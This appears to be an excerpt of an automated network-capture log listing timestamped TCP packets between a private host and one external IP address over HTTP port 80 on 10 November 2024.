                                                                                                                                                                                Nov 10, 2024 09:18:23.887783051 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.887845039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887898922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887916088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887928963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.887948036 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.888020039 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.888400078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.888420105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.888432026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.888488054 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.891886950 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.891900063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.891917944 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.891973019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.891973019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:23.935460091 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.935475111 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.935487986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:23.935576916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.003840923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.003865957 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.003878117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.003952980 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.003957987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.003971100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.003983021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.003995895 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.004007101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.004019022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.004038095 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.004057884 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.004307985 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.004319906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.004332066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.004344940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.004359961 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.004412889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.011133909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.011152983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.011171103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.011267900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.051939011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.051976919 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.051989079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.052170038 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.119016886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119031906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119045019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119066954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119118929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.119144917 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119165897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119168997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.119179010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119195938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119220018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.119249105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.119951010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.119961977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.120023012 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.120313883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.120368004 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.120487928 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.123289108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.123327017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.123347044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.123399019 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.167203903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.167226076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.167249918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.167306900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.167318106 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.167325974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.167395115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.234822035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.234893084 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.234910965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.234925032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.234937906 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.234937906 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.234963894 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.235151052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.235194921 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.235310078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.235387087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.235400915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.235414028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.235426903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.235433102 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.235451937 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.239073038 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.239093065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.239105940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.239150047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.239150047 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.282741070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.282800913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.282810926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.282830954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.282847881 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.282902002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.282902002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.350320101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350384951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350397110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350411892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350424051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350572109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.350572109 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.350671053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350725889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350737095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350749016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350761890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.350783110 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.350867033 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.351460934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.351510048 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.351521969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.351566076 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.354911089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.354923010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.354934931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.354974031 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.398413897 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.398437977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.398456097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.398474932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.398488045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.398530006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.398555994 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.466032028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466057062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466068029 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466089010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466100931 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466119051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466156006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.466156006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.466206074 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.466607094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466626883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466639996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466690063 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.466707945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466721058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466733932 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.466763020 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.466806889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.467598915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.467642069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.467690945 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.470458984 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.470478058 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.470489979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.470541000 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.514130116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.514151096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.514163017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.514213085 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.514214993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.514228106 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.514305115 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.581842899 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.581865072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.581877947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.581891060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.581904888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.581923008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.581954002 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.582150936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582174063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582200050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582199097 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.582243919 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.582498074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582535028 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582546949 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582597971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.582986116 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.582998037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.583010912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.583034039 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.583064079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.587155104 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.587167978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.587178946 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.587207079 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.630016088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.630028963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.630039930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.630058050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.630064011 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.630069971 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.630108118 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.697371960 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697392941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697406054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697417974 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697432041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697443962 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.697483063 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.697699070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697735071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697747946 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.697778940 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.698028088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.698038101 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.698081017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.698232889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.698246002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.698265076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.698272943 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.698286057 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.698312998 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.702729940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.702743053 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.702769041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.702783108 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.702784061 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.702827930 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.745609045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.745634079 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.745644093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.745670080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.745682955 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.745692968 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.745722055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.745742083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.745775938 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.746257067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.746268034 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.746309996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.813231945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813263893 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813283920 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813299894 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813306093 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.813313007 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813335896 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.813467979 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813507080 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.813525915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813538074 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813575029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.813750982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813822031 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813832998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813843966 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.813859940 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.813891888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.814301968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.814366102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.814379930 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.814414978 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.818263054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.818310022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.818319082 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.818356037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.818366051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.818402052 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.861361980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.861376047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.861388922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.861406088 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.861437082 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.861498117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.861510992 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.861522913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.861577988 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.903506041 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.903521061 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.903578997 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.928740025 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.928814888 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.928833961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.928848982 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.928853989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.928867102 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.928886890 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.929090977 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929102898 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929116011 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929128885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.929156065 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.929383993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929398060 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929410934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929440022 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.929696083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929737091 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:24.929821014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:24.929833889 CET8049833147.45.47.81192.168.2.9
